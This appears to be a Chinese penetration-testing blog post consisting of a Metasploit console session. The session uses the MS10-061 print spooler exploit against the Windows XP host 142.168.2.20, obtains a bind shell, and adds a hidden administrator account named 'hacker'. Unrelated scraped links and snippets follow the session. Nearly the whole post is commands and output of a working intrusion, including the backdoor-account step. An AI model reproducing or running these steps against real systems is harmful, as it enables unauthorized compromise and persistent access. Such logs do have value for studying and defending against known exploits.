1. [*] Please wait while the Metasploit Pro Console initializes...
  2. [*] Starting Metasploit Console...
  3. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  4. MMMMMMMMMMM MMMMMMMMMM
  5. MMMN$ vMMMM
  6. MMMNl MMMMM MMMMM JMMMM
  7. MMMNl MMMMMMMN NMMMMMMM JMMMM
  8. MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
  9. MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
  10. MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
  11. MMMNI MMMMM MMMMMMM MMMMM jMMMM
  12. MMMNI MMMMM MMMMMMM MMMMM jMMMM
  13. MMMNI MMMNM MMMMMMM MMMMM jMMMM
  14. MMMNI WMMMM MMMMMMM MMMM# JMMMM
  15. MMMMR ?MMNM MMMMM .dMMMM
  16. MMMMNm `?MMM MMMM` dMMMMM
  17. MMMMMMN ?MM MM? NMMMMMN
  18. MMMMMMMMNe JMMMMMNMMM
  19. MMMMMMMMMMNm, eMMMMMNMMNMM
  20. MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
  21. MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
  22. =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
  23. + -- --=[ 840 exploits - 495 auxiliary - 146 post
  24. + -- --=[ 250 payloads - 27 encoders - 8 nops
  25. [*] Successfully loaded plugin: pro
  26. msf > search ms10_061
  27. Matching Modules
  28. ================
  29. Name Disclosure Date Rank Description
  30. ---- --------------- ---- -----------
  31. exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation
  32. Vulnerability
  33. msf > use exploit/windows/smb/ms10_061_spoolss
  34. msf exploit(ms10_061_spoolss) > info
  35. Name: Microsoft Print Spooler Service Impersonation Vulnerability
  36. Module: exploit/windows/smb/ms10_061_spoolss
  37. Version: 14976
  38. Platform: Windows
  39. Privileged: Yes
  40. License: Metasploit Framework License (BSD)
  41. Rank: Excellent
  42. Provided by:
  43. jduck <jduck@metasploit.com>
  44. hdm <hdm@metasploit.com>
  45. Available targets:
  46. Id Name
  47. -- ----
  48. 0 Windows Universal
  49. Basic options:
  50. Name Current Setting Required Description
  51. ---- --------------- -------- -----------
  52. PNAME no The printer share name to use on the target
  53. RHOST yes The target address
  54. RPORT 445 yes Set the SMB service port
  55. SMBPIPE spoolss no The named pipe for the spooler service
  56. Payload information:
  57. Space: 1024
  58. Avoid: 0 characters
  59. Description:
  60. This module exploits the RPC service impersonation vulnerability
  61. detailed in Microsoft Bulletin MS10-061. By making a specific DCE
  62. RPC request to the StartDocPrinter procedure, an attacker can
  63. impersonate the Printer Spooler service to create a file. The
  64. working directory at the time is %SystemRoot%\system32. An attacker
  65. can specify any file name, including directory traversal or full
  66. paths. By sending WritePrinter requests, an attacker can fully
  67. control the content of the created file. In order to gain code
  68. execution, this module writes to a directory used by Windows
  69. Management Instrumentation (WMI) to deploy applications. This
  70. directory (Wbem\Mof) is periodically scanned and any new .mof files
  71. are processed automatically. This is the same technique employed by
  72. the Stuxnet code found in the wild.
  73. References:
  74. http://www.osvdb.org/67988
  75. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
  76. http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
  77. msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20
  78. RHOST => 142.168.2.20
  79. msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp
  80. PAYLOAD => windows/shell/bind_tcp
  81. msf exploit(ms10_061_spoolss) > info
  82. Name: Microsoft Print Spooler Service Impersonation Vulnerability
  83. Module: exploit/windows/smb/ms10_061_spoolss
  84. Version: 14976
  85. Platform: Windows
  86. Privileged: Yes
  87. License: Metasploit Framework License (BSD)
  88. Rank: Excellent
  89. Provided by:
  90. jduck <jduck@metasploit.com>
  91. hdm <hdm@metasploit.com>
  92. Available targets:
  93. Id Name
  94. -- ----
  95. 0 Windows Universal
  96. Basic options:
  97. Name Current Setting Required Description
  98. ---- --------------- -------- -----------
  99. PNAME no The printer share name to use on the target
  100. RHOST 142.168.2.20 yes The target address
  101. RPORT 445 yes Set the SMB service port
  102. SMBPIPE spoolss no The named pipe for the spooler service
  103. Payload information:
  104. Space: 1024
  105. Avoid: 0 characters
  106. Description:
  107. This module exploits the RPC service impersonation vulnerability
  108. detailed in Microsoft Bulletin MS10-061. By making a specific DCE
  109. RPC request to the StartDocPrinter procedure, an attacker can
  110. impersonate the Printer Spooler service to create a file. The
  111. working directory at the time is %SystemRoot%\system32. An attacker
  112. can specify any file name, including directory traversal or full
  113. paths. By sending WritePrinter requests, an attacker can fully
  114. control the content of the created file. In order to gain code
  115. execution, this module writes to a directory used by Windows
  116. Management Instrumentation (WMI) to deploy applications. This
  117. directory (Wbem\Mof) is periodically scanned and any new .mof files
  118. are processed automatically. This is the same technique employed by
  119. the Stuxnet code found in the wild.
  120. References:
  121. http://www.osvdb.org/67988
  122. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
  123. http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
  124. msf exploit(ms10_061_spoolss) > exploit
  125. [*] Started bind handler
  126. [*] Trying target Windows Universal...
  127. [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
  128. [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
  129. [*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ...
  130. [*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61
  131. [*] Job started: 0x4
  132. [*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe
  133. [*] Job started: 0x5
  134. [*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof
  135. [*] Everything should be set, waiting for a session...
  136. [*] Sending stage (240 bytes) to 142.168.2.20
  137. Microsoft Windows XP [???? 5.1.2600]
  138. (C) ???????? 1985-2001 Microsoft Corp.
  139. C:\WINDOWS\system32>net user
  140. net user
  141. \\ ??????????
  142. -------------------------------------------------------------------------------
  143. Administrator Guest HelpAssistant
  144. IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy
  145. SUPPORT_388945a0
  146. ????????????????????????????????????
  147. C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add
  148. net user hacker 123 /add & net localgroup administrators hacker /add
  149. ??????????????
  150. ??????????????
  151. C:\WINDOWS\system32>net user
  152. net user
  153. \\ ??????????
  154. -------------------------------------------------------------------------------
  155. Administrator Guest hacker
  156. HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC
  157. shentouceshiwy SUPPORT_388945a0
  158. ????????????????????????????????????
  159. C:\WINDOWS\system32>

渗透杂记-2013-07-13 ms10_061_spoolss的更多相关文章

  1. http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

    http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

  2. http://www.ruanyifeng.com/blog/2013/07/gpg.html

    http://www.ruanyifeng.com/blog/2013/07/gpg.html

  3. 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

    http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

  4. <2013 07 31> 没有必然的理由

    <2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...

  5. 渗透杂记-2013-07-13 关于SMB版本的扫描

    smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...

  6. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  7. 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

    Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...

  8. <2013 07 06> "极路由" 与 “家庭服务器” 报道两则

    跟我做!打造家庭服务器 很久没有更新了,因为之前托朋友帮我弄的mini PC终于到手了.阴差阳错地,原来只打算弄一台将就可用的低功耗下载机,结果到手的却是一台支持1080p(宣称,还没烧过),还带遥控 ...

  9. Cheatsheet: 2013 07.21 ~ 07.31

    Mobile Android vs. iOS: Comparing the Development Process of the GQueues Mobile Apps Android Studio ...

随机推荐

  1. QT socket相关

    #include<QtNetwork/QTcpSocket>#include<QtNetwork/QTcpServer> 1.服务器端 void About::init_tcp ...

  2. C#写入日志信息到文件中

    为了在服务器上运行程序及时的跟踪出错的地方,可以在必要的地方加入写日志的程序. string folder = string.Format(@"D:\\{0}\\{1}", Dat ...

  3. xcode调整debug,release模式

    今天调试的时候发现变量都不能查看了.在「lldb」中通过「po」命令来查看总是提示变量未找到. 环境 xcode 7, Swift 2 错误提示 ‘XXXX’ was compiled with op ...

  4. 使用HTTPS网站搭建iOS应用内测网站(OTA分发iOS应用)

    为什么要搭建应用内测网站呢? 1.AppStore的审核速度比较慢,万一被拒,还得等,而且一旦发布,任何人都可以下载,而有些时候只有老板想知道最新的修改是否符合要求,万一不符合要求呢?又要修改了. 2 ...

  5. Web 服务器 low bandth DOS attack

    https://www.owasp.org/images/0/04/Roberto_Suggi_Liverani_OWASPNZDAY2010-Defending_against_applicatio ...

  6. Navicat Premium相关注册码

    --Navicat for SQL Server V10.0.10NAVD-3CG2-6KRN-IEPMNAVL-NIGY-6MYY-XWQENAVI-C3UU-AAGI-57FW --Navicat ...

  7. 如何在自己的代码中实现分享视频文件或者是图片文件到微信 QQ微博 新浪微博等!!!

    首先在文档第一句我先自嘲下 , 我是大傻逼, 弄了两天微信是视频分享,一直被说为啥跟系统的相册分享的不一样,尼玛!!! 这里来说正文,我这里不像多少太多,大家都是程序猿,具体的阔以看代码. 搞代码之前 ...

  8. JavaSE基础第一篇

      1.JDK的安装: 包括JRE 和JVM   下载地址: www.oracle.com/www.sun.com 2.环境变量 set path = "bin所在路径" 设置pa ...

  9. Android--RecyclerView的封装使用

    1,用了很长一段时间的RecyclerView,在项目中用的频率也越来越频繁(因为踩得坑也越来越多了),或过头来看,感觉一直在写RecyclerView.Adapter中的三个方法和一个内部类,感觉很 ...

  10. Apache+Tomcat实现负载均衡

    反向代理负载均衡 (Apache2+Tomcat7/8) 使用代理服务器可以将请求转发给内部的Web服务器,让代理服务器将请求均匀地转发给多台内部Web服务器之一上,从而达到负载均衡的目的.这种代理方 ...